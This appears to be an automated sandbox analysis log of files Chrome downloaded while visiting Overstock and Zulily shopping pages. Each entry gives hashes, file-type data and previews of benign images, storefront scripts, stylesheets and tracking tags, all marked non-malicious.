                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 800x232, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):55376
                                                                                                                                                                                    Entropy (8bit):7.958790665346285
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:Wcxi4HLNBbJzgtcUFiJ5S8Hr3ZWKxIu2DDfWT68mI76jE4yYjr59Jwrkp8qol6Hp:9xzH32+UFiJA8HrpFqrfvzIUz8yJ3
                                                                                                                                                                                    MD5:C5C3F89368C060CFA3480FC6276CE323
                                                                                                                                                                                    SHA1:27171FBFA184B08BE622BE6E3E5378B39F781262
                                                                                                                                                                                    SHA-256:A1B11E3AB58E027F831084694A15B33E00D9353B22B9D4094DD5454387071BFD
                                                                                                                                                                                    SHA-512:E050D88921865113246D85671AA40D1D959D68814086A4439A4EDB7306C4AB763CD0F1C853FD8D1FBCB03A93B1208C3371C6A5D4768E3E191F18342413493204
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100.................... .......................ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}........ .......................................................................................=...........................................#=..p(...D.....<.....U.......@.......0.@.(eL...`0.`..B-.krZ..O..........................
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (36511)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):36534
                                                                                                                                                                                    Entropy (8bit):5.658837419730568
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:MjEkL37lj5OIiqZEzfLLlEoczIaNCvhT35+ZENGuTNzaU6xZxpfmfgiC1Uj8NDRi:wXJVpicEzfLLlK0vhIxZxpggUyRdVO
                                                                                                                                                                                    MD5:F6106F5B5964EE6A29C11A0E41A897BA
                                                                                                                                                                                    SHA1:6383B55E025EB19E178220DF9F9A33A8599F8986
                                                                                                                                                                                    SHA-256:AFDB73B4F15B06F36163A602B03BA327DCAC2B9158B00C7177654EDBE3A1530A
                                                                                                                                                                                    SHA-512:72EAE4842ECB9B739BA4F0B2740D99FF5BC24C7C4394EFED2D5D60C5BE4E243714AB46CA962CB429BE07872AF9E68A56B947C43C34815F5B5CA95F208704C128
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:var Ae=Object.defineProperty;var Be=(e,t,n)=>t in e?Ae(e,t,{enumerable:!0,configurable:!0,writable:!0,value:n}):e[t]=n;var ge=(e,t,n)=>(Be(e,typeof t!="symbol"?t+"":t,n),n);import{r as u,j as s,p as Fe,c as P,H as Me,a as $e,b as De}from"./vsearch-vendor.2xH_R9Qb.js";import{s as V}from"./vsearch-facetssearchresultswrapper.Cuju1057.js";var Ue={VITE_BASE_URL:"https://api.overstock.com",VITE_SEARCH_PATHNAME:"/search",VITE_COLLECTIONS_PATHNAME:"/collections",VITE_FACETS_AND_PRODUCTS_API_URL:"/vsearch/products/v1",VITE_AUTOCOMPLETE_SUGGESTIONS:"/search/suggestions",VITE_POWER_REVIEW_API_KEY:"0ce15d13-67ca-47dd-8c72-1d5e4694ada3",VITE_POWER_REVIEW_MERCHANT_GROUP_ID:"1939031562",VITE_POWER_REVIEW_MERCHANT_ID:"1280018588",VITE_SANDBOX_BASE_URL:"https://api-integration.test.overstock.com",VITE_IS_TAXONOMY_FACETS_ENABLED:"false",BASE_URL:"/",MODE:"production",DEV:!1,PROD:!0,SSR:!1};const Ve="/search",We="/collections",Ge="/vsearch/products/v1",ze="/search/suggestions",He="0ce15d13-67ca-47dd-8c72
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (21917)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):21950
                                                                                                                                                                                    Entropy (8bit):5.268822432431172
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:ss5gS2oxB07/1U3HEuncEcuO4Ourog9sqks6ULa/9J1lHR685asD949WrnQEo+kb:sb1U0uncEcuO4Oukg9sqks6ULa/9J1F0
                                                                                                                                                                                    MD5:413FC23E2CF4523879EAA651B15C7B97
                                                                                                                                                                                    SHA1:72E82F36157843FE6CD54347E80634F4314CABA5
                                                                                                                                                                                    SHA-256:98E6300A88C47DEC40CF3E167FA5A32D65FFE456093DA42F3D594881866C7A6A
                                                                                                                                                                                    SHA-512:4BBA1AFB6D9F7E4FF4E0FE7090D930A780068F70A9AD5004D795D590AFEA2D4EEBD231BF153392E784EDBB98AF2433B18DF7B75D4E6DD0F99F4787E4BD34BDFC
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:(self.webpackChunkdomaine_zulily_theme=self.webpackChunkdomaine_zulily_theme||[]).push([[411],{1296:(t,e,n)=>{var i={"./cart/index.js":[352,292,421],"./customer/addresses/index.js":[4483,869,612],"./customer/login/index.js":[5999,815],"./customer/order/index.js":[2282,6],"./evergreen-cards/index.js":[7410,869,601],"./example/index.js":[6573,869,792],"./flashsale-queue/index.js":[7740,803],"./flashsale/index.js":[3394,869,410],"./footer/index.js":[3826,29],"./header/index.js":[8636,636],"./power-reviews-war-form/index.js":[870,12],"./product-grid/index.js":[6068,821],"./product/index.js":[3095,292,630],"./promo-banner/index.js":[5469,869,439],"./recommended-products/index.js":[3339,869,416],"./related-collections/index.js":[8888,869,809],"./section-password-form-custom/index.js":[9089,618],"./slider/index.js":[4842,869,619],"./subscription-modal/index.js":[3952,404],"./toast-notification/index.js":[3860,213],"./utils/storefront/index.js":[299,653],"./vsearch-flashsale-collection/index.j
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2471
                                                                                                                                                                                    Entropy (8bit):7.083424681565379
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:NBIl/XflVxexLI5BVcuyUjKMgpoijgBhxVoP9AOpT23pBmecMzkEXR:NBIl/Xrxw3VtEBXVo1AbpBfhhR
                                                                                                                                                                                    MD5:8FF8AE0F4B136475D2B2D4E3B668B9BF
                                                                                                                                                                                    SHA1:0BE124BCD3F46F72D9A5048BDF920B746B153A0D
                                                                                                                                                                                    SHA-256:956A95FA44CF12D50F23337A75EE1F5270212FC413FEF162483643C99D194551
                                                                                                                                                                                    SHA-512:3DC44315263C9DBF67E6E9CE22DB3A3FAE848A09D332D90900BE6D366C05E902C4F4C13610E0CAE72A6D5C2F82A49C588D66EB49BED5C18036531523A2C2FDAB
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P................................................................................r......#>.'s.|B..>..-.8..)..}...lfp....Vw.y.,T@19v.y..Y}.,.qc.z.e*.]..&3...+>.W.....,Z..........W....-....?..u..|..|.$6.+...c.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):142
                                                                                                                                                                                    Entropy (8bit):4.635171964513492
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:YLAfHNVqkW/+eOCAnBzQilcOfMX2Je+Tk64evQVQsLVn:YWtIkW/fAnBzvcO0X2JTY7LVn
                                                                                                                                                                                    MD5:2017DB9BA9E10C9266D2F2C507CEF1CF
                                                                                                                                                                                    SHA1:83D829A206FBBE780B1772A319DDBBB12F75D3F0
                                                                                                                                                                                    SHA-256:0D9524B3AF62E8520BCC301723A15AC1BCB84949C06B1549CD8A3E6C65BFECE6
                                                                                                                                                                                    SHA-512:013BE030651466F127930945CF588ABC57778B1EF8F1B3A26098A1CA1B457992EAC92835DBD1DF677FA07B61F52F9C2AE250A9A4A3099BF2E4B881393A41B8C1
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://display.powerreviews.com/m/1280018588/l/en_US/product/39225740/snippet?apikey=0ce15d13-67ca-47dd-8c72-1d5e4694ada3&_noconfig=true
                                                                                                                                                                                    Preview:{"name":"snippet","results":[{"page_id":"39225740","rollup":{"average_rating":3.2,"rating_count":5,"review_count":5,"answered_questions":0}}]}
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (11918)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):12166
                                                                                                                                                                                    Entropy (8bit):5.073294047888421
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:srgam9qFdvSXviP/75KXLkmRrQQX4gbpKTnrB0OnbhWH+GH+VMl7/GQsAyXavaKE:srgaYMhWi375k4nfb4H+Gf7/GKrz8yI
                                                                                                                                                                                    MD5:60C2013E230D19854401DBD768D0FBC6
                                                                                                                                                                                    SHA1:EDB76ED6E569C7071446243961746AB89D81083F
                                                                                                                                                                                    SHA-256:31B3B98D61C7F74623C8F048649B6CC56EE378F448FC86C6A0012C5EE7CA3B7C
                                                                                                                                                                                    SHA-512:302A97CD350C11DE768F1CA3475F03C65B01CA6748B1748EFF4543F19A7D36881AA8F0825908765EB7D290C1CB9888A7D75F896683E3A83B002D9B815701C73E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/SubscriptionPriceBreakdown.CxrCP-xw.js
                                                                                                                                                                                    Preview:const __vite__mapDeps=(i,m=__vite__mapDeps,d=(m.f||(m.f=["SubscriptionGroupLine.CD4J-c2w.js","app.DfgMZONA.js","assets/app.whj6cDzT.css","StackedMerchandisePreview.JyjIicj-.js","assets/StackedMerchandisePreview._xnAOXmq.css"])))=>i.map(i=>d[i]);.import{fc as w,fh as R,q as x,bH as I,bI as T,_ as B,e as f,cb as L,a as _,aG as k,ce as b,ci as C,az as M,E as q,bK as N,a$ as E,b1 as $,dh as A,ab as G,lI as U,a8 as S}from"./app.DfgMZONA.js";function ie(){const e=w(),o=R();return x((s,t,c)=>{const p=o.value.defaultAttributes?.shopId||1,r={schemaId:"checkout_display_shipping_methods/1.0",payload:{eventTimestamp:t,shopId:p,apiClientId:c,promiseRetrievalTime:s}};e.record(r)},[e,o.value.defaultAttributes?.shopId])}const z=I({load:()=>T(()=>B(()=>import("./SubscriptionGroupLine.CD4J-c2w.js").then(e=>e.a),__vite__mapDeps([0,1,2,3,4])))});function re({subscriptionLines:e}){const o=f(),{extensionsBefore:u,extensionsAfter:s}=L({targeted:!0,hasMultipleDeliveryGroups:!0}),t=e.length;return t===0?null:_
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (1730)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1838
                                                                                                                                                                                    Entropy (8bit):5.059767741643988
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:QiQzjXQoOosI9IdoU9vR/5t+IGx+Ij+I5+IAlsIx+xNuW8:uzjXOosii9vRxt+v+g+E+jGRR8
                                                                                                                                                                                    MD5:F6C29A323A0A1450C2DB0421C2AF1BC2
                                                                                                                                                                                    SHA1:A87FD9A2479C155F70EC4B39F8295554117C1C06
                                                                                                                                                                                    SHA-256:FBE972B1F0C3DB7BA54402ECD9AE86BBFBB35D46D6B277B9191C042B8C93E6EA
                                                                                                                                                                                    SHA-512:687CCFF07A6AA9744A791F8BF54976E5A4B5B5DCD15DD8A82D5A644F865EE3B2E68DB2236EF528C276D97389E7419F2CD5B2A5A45A1286DBADCE4B3BD296D088
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/component-scroller.css?v=172298930654121046611730157903
                                                                                                                                                                                    Preview:carousel-slider{position:relative;display:block}@media (min-width: 990px){carousel-slider:hover .pill-nav-slider-inline-nav{opacity:1;z-index:100}}@media (max-width: 989px){.scroller{overflow:hidden}}.scroller.scroller-desktop{overflow:hidden}.collection-block-subcollections .grid{display:flex;flex-wrap:wrap;padding:0;margin:0;list-style:none;column-gap:20px;row-gap:20px}@media (max-width: 989px){.scroller-inner{padding-bottom:20px;overflow-x:auto;overflow-y:hidden;scroll-snap-type:x mandatory}.scroller-inner .grid{flex-flow:row nowrap;padding:1px 1px 2px}}@media (max-width: 749px){.scroller-inner .grid .grid-item:not(:only-of-type){width:50%;max-width:50%}.collection-block-subcollections .grid .grid-item:not(:only-of-type){width:65%;max-width:65%}.collection-block-subcollections .scroller-inner{padding-bottom:0}.scroller-inner .collage{display:flex;flex-flow:row nowrap}.scroller-inner .collage .card-overlay:not(:only-of-type){width:85%;max-width:85%;flex:none;scroll-snap-align:center}
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):4101
                                                                                                                                                                                    Entropy (8bit):4.691709396724558
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:4Zc5WT9BvpXKZhUyXuXsk8hLb3Dhm2ykOog:4Zc5WNXK3XuXW5E
                                                                                                                                                                                    MD5:ED611F8363C6F27C06038DA447218B1E
                                                                                                                                                                                    SHA1:0A43399464AA220CE260C40C52AEC7101316FC2B
                                                                                                                                                                                    SHA-256:C8A76032777547F015295A40D0F180058EE78F67D5EEA65684D8374AC3273147
                                                                                                                                                                                    SHA-512:0E6CCF3444E0C2B8056B9FDFF5A0E1DB0495E4625607A2347F6BD8B44C0EC73562492A8C066785DD77A4B41E6291D8280C1B2DEB496AD533E136FAB038AB42DE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:(function(w,d,c,k,a,b,t,e) {.. var cs = d.currentScript;.. if (cs) {.. var uo = cs.getAttribute('data-ueto');.. if (uo && w[uo] && typeof w[uo].setUserSignals === 'function') {.. w[uo].setUserSignals({'co': c, 'kc': k, 'at': a, 'bi': b, 'dt': t, 'ec': e});.. }.. }..})(window, document, 'us', true, false, false, false, false);..(function(w,d,s,i) {.. var c=d.currentScript;.. if (c) {.. var uo = c.getAttribute('data-ueto');.. if (uo && w[uo] && w[uo].uetConfig && w[uo].uetConfig.deBlock === true).. return;.. }.. var f,j; f=d.getElementsByTagName(s)[0]; j=d.createElement(s); j.async=true;.. j.src='https://www.clarity.ms/tag/uet/'+i+'';.. j.onload = function () {.. if (!c) return;.. var co = function(u) { return u && typeof u === 'object' && !(u instanceof Array) && u.beaconParams && u.beaconParams.mid && w.clarity; };.. var r = 40;.. var cl = function() {.. if (r-- <
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):24
                                                                                                                                                                                    Entropy (8bit):2.459147917027245
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:CUXJ/lH:Dl
                                                                                                                                                                                    MD5:BC32ED98D624ACB4008F986349A20D26
                                                                                                                                                                                    SHA1:2D3DF8C11D2168CE2C27E0937421D11D85016361
                                                                                                                                                                                    SHA-256:0C9CF152A0AD00D4F102C93C613C104914BE5517AC8F8E0831727F8BFBE8B300
                                                                                                                                                                                    SHA-512:71ACC6DA78D5D5BF0EEA30E2EE0AC5C992B00EFEC959077DFE0AB769F1DBBD9AF12D5C5C155046283D5416BEB606A9EF323FB410E903768B1569B69F37075B4E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:GIF89a.......,..........
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):2634
                                                                                                                                                                                    Entropy (8bit):7.3944855785781884
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:EIl/XflVKaQSxjGC0dpDi8vgu75v+v4eo0b28w9giKROgsYWcMc9b:EIl/X/KLwCLd9fGv5LacPW9Sb
                                                                                                                                                                                    MD5:34113CF76FF368A701CBA131AF265E0A
                                                                                                                                                                                    SHA1:7A6CC18ED47A887CD78BD61767B8A5EB1D848392
                                                                                                                                                                                    SHA-256:91CF9BB2DDA9A543967C65DC98A77FE608E6C572758640E55650EAB983C79D31
                                                                                                                                                                                    SHA-512:9CF830232D073EDE3040E6AA3BAE7E15F7F4C08A1F3D262C5948875C3BC6894303C04BC4B593894AE35C6274CBD3C1032340F57428DA24D5E0C27420A205FA91
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa_43b8675f-2eed-4796-9f8d-a6400c70193f.jpg?v=1729322975&width=80
                                                                                                                                                                                    Preview:RIFFB...WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 ....p ...*P.P.>1..C.!!...x ....^.).QXC.;.}.......S......................k.....?......3...`...b.......m...?.....ln..)X9.G})y|...%.I.8.....H.f\.M.\k...p=......_.9...t.Tk....... h......$.6..m(.S5..z%..C. ..1.;....0&.I..F......<`.h.<}g....-,......=y*.....@....h..6(>..H..__.s4b^..d.G...9O9\k/.......>Z.#.2.r!.x.`..7y;..d.l...ss..g&#.wC...J'.q.9.^.w...........j<..+..........l*..W..'/...)...z7?.. .h].\..+6....s=.r.....f.j{qZ.T]X.A.....}H...z.. .].1.....B.<..[..]..G..U..I7.2.m....9..F...-.}.(...*..gs..n..<.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):319457
                                                                                                                                                                                    Entropy (8bit):5.3045910498552304
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:to3Tq+IWocbEcYEj7axcAfnCvsdCVIihAxfCh4tKBRTM2wwCS1E+E44r9Z38e:to3u3BcYEj7Ac5kxfltypE44hZ38e
                                                                                                                                                                                    MD5:45E78EB6E4858F0DF6C8C789B1886561
                                                                                                                                                                                    SHA1:E1778707ADB03CA4CAF94AE8536A07C89C3B5839
                                                                                                                                                                                    SHA-256:D9AA27DF86607BC37AD9FCA49EEDF7389DCF107D45474E664133DEB667081750
                                                                                                                                                                                    SHA-512:673D617EE4843D46746D29E8C8C98405B72F9AB7803D227B53FC5157A24786008939CFFEB5FDDEED46A02A52D302B2CD15FF0F2DC71E7898FC7421BF9C440AD9
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/static/search-nav.vendor.d9aa27df86607bc37ad9fca49eedf7389dcf107d45474e664133deb667081750.js
                                                                                                                                                                                    Preview:(window.__LOADABLE_LOADED_CHUNKS__=window.__LOADABLE_LOADED_CHUNKS__||[]).push([[0],[function(e,t){var n;e.exports=function(e,t,r,o){n||(n="function"==typeof Symbol&&Symbol.for&&Symbol.for("react.element")||60103);var i=e&&e.defaultProps,a=arguments.length-3;if(t||0===a||(t={children:void 0}),1===a)t.children=o;else if(a>1){for(var u=new Array(a),s=0;s<a;s++)u[s]=arguments[s+3];t.children=u}if(t&&i)for(var l in i)void 0===t[l]&&(t[l]=i[l]);else t||(t=i||{});return{$$typeof:n,type:e,key:void 0===r?null:""+r,ref:null,props:t,_owner:null}}},function(e,t,n){"use strict";e.exports=n(279)},function(e,t){e.exports=function(e,t,n){return t in e?Object.defineProperty(e,t,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[t]=n,e}},function(e,t,n){"use strict";var r=n(1),o=n.n(r),i=n(8),a=n.n(i),u=o.a.createContext(null);var s=function(e){e()},l={notify:function(){}};function c(){var e=s,t=[],n=[];return{clear:function(){n=null,t=null},notify:function(){var r=t=n;e((function(){for(var e=0;e<r
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (61318)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):63548
                                                                                                                                                                                    Entropy (8bit):5.513992669525927
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:qYWvuPAadRXadFil26aAn7t2npMvCm+uGYD8BQrEWvyElVlqZw4aN8uDvz6TCLIc:qYW2Pj5yO7t2ACRg83984zo
                                                                                                                                                                                    MD5:0B3AA139FB0B091A43C7BC50F6CB3BBF
                                                                                                                                                                                    SHA1:04686CC4BB3A7FD4D0C748A4409C610E9548897B
                                                                                                                                                                                    SHA-256:0060A5C23A9B264CB43004135839FFF956C9B79EAB5742447E67DFEB9368144E
                                                                                                                                                                                    SHA-512:2C1E5D73F55A48CA782B76983FE734E7FBC43D43FBF6E2FF89268D527E18727BCEC082368B45F4F6F934B6D73116B7C8BA8C36A14BF904C1AA36761486668C99
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/custom/web-pixel-26050719@9/sandbox/modern/
                                                                                                                                                                                    Preview:<!DOCTYPE html>.<html>. <head>. <meta charset="utf-8">. <title>Web Pixels Manager Sandbox</title>. <script type="text/javascript">. (()=>{var e={3482:function(e,t,r){var n,i,o;!function(a,s){"use strict";i=[r(3550)],void 0===(o="function"==typeof(n=function(e){var t=/(^|@)\S+:\d+/,r=/^\s*at .*(\S+:\d+|\(native\))/m,n=/^(eval@)?(\[native code])?$/;return{parse:function(e){if(void 0!==e.stacktrace||void 0!==e["opera#sourceloc"])return this.parseOpera(e);if(e.stack&&e.stack.match(r))return this.parseV8OrIE(e);if(e.stack)return this.parseFFOrSafari(e);throw new Error("Cannot parse given Error object")},extractLocation:function(e){if(-1===e.indexOf(":"))return[e];var t=/(.+?)(?::(\d+))?(?::(\d+))?$/.exec(e.replace(/[()]/g,""));return[t[1],t[2]||void 0,t[3]||void 0]},parseV8OrIE:function(t){return t.stack.split("\n").filter((function(e){return!!e.match(r)}),this).map((function(t){t.indexOf("(eval ")>-1&&(t=t.replace(/eval code/g,"eval").replace(/(\(eval at [^()]*)|(,.*$)/g,""));va
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (9217)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):234260
                                                                                                                                                                                    Entropy (8bit):5.456621895233652
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:zfLeYH8AtPJ137OeR8NteGvQ+AMPpgArl0xYu58K713FN:zfLeYc+PJxH8N7QQGArHu58K713z
                                                                                                                                                                                    MD5:C04BB3EDB0F1A33B985B3285055FE1FA
                                                                                                                                                                                    SHA1:0AE234EBC67E016B8A3B5603885A67160493227C
                                                                                                                                                                                    SHA-256:668C6828672FA8600B7A0632CB328EE63A31361BE6734987B04985FCD9D08D4F
                                                                                                                                                                                    SHA-512:8E154181A67EF7706AB11421D2A91270F9620895CA54EDA89E73E60533FB2F72CF7E3323F4F56EB08C177F69E4CFC36117E011B3DD2479B07267C7E1F74C8B5D
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://connect.facebook.net/en_US/fbevents.js
                                                                                                                                                                                    Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (61318)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):62111
                                                                                                                                                                                    Entropy (8bit):5.51116653266677
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:qYWvuPAadRXadFil26aAn7t2npMvCm+uGYD8BQrEWvyElVlqZw4aN8uDvz6TCLI2:qYW2Pj5yO7t2ACRg839837
                                                                                                                                                                                    MD5:0128753413D320761896E9FD66AFC6AE
                                                                                                                                                                                    SHA1:490DA439D2EEA205FEC9243043B293DDDA578181
                                                                                                                                                                                    SHA-256:76E622E3B35FC271F4089FFD2644F5D72D2576F612F334860148CDD7F5A3637A
                                                                                                                                                                                    SHA-512:C5FB8963D57B0FC5371C9ACEE6705A0E6AA99E6BB54C7DF0C347C44E504FCFAAF3AAA408E058698A21C7AEAB9FB040AB6EC64F954C42E6C2B4DBD3F2954BDE3B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.zulily.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/custom/web-pixel-shopify-custom-pixel@0220/sandbox/modern/
                                                                                                                                                                                    Preview:<!DOCTYPE html>.<html>. <head>. <meta charset="utf-8">. <title>Web Pixels Manager Sandbox</title>. <script type="text/javascript">. (()=>{var e={3482:function(e,t,r){var n,i,o;!function(a,s){"use strict";i=[r(3550)],void 0===(o="function"==typeof(n=function(e){var t=/(^|@)\S+:\d+/,r=/^\s*at .*(\S+:\d+|\(native\))/m,n=/^(eval@)?(\[native code])?$/;return{parse:function(e){if(void 0!==e.stacktrace||void 0!==e["opera#sourceloc"])return this.parseOpera(e);if(e.stack&&e.stack.match(r))return this.parseV8OrIE(e);if(e.stack)return this.parseFFOrSafari(e);throw new Error("Cannot parse given Error object")},extractLocation:function(e){if(-1===e.indexOf(":"))return[e];var t=/(.+?)(?::(\d+))?(?::(\d+))?$/.exec(e.replace(/[()]/g,""));return[t[1],t[2]||void 0,t[3]||void 0]},parseV8OrIE:function(t){return t.stack.split("\n").filter((function(e){return!!e.match(r)}),this).map((function(t){t.indexOf("(eval ")>-1&&(t=t.replace(/eval code/g,"eval").replace(/(\(eval at [^()]*)|(,.*$)/g,""));va
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (31991)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):67422
                                                                                                                                                                                    Entropy (8bit):5.440861073280608
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:8ZtTQh899C5kd0aNC47my8VQxwY6NpXifr40/QuXBTVILhjch/Weq4uuxRm6koDe:W9C5kvGy8VkwsGV/gECbY/
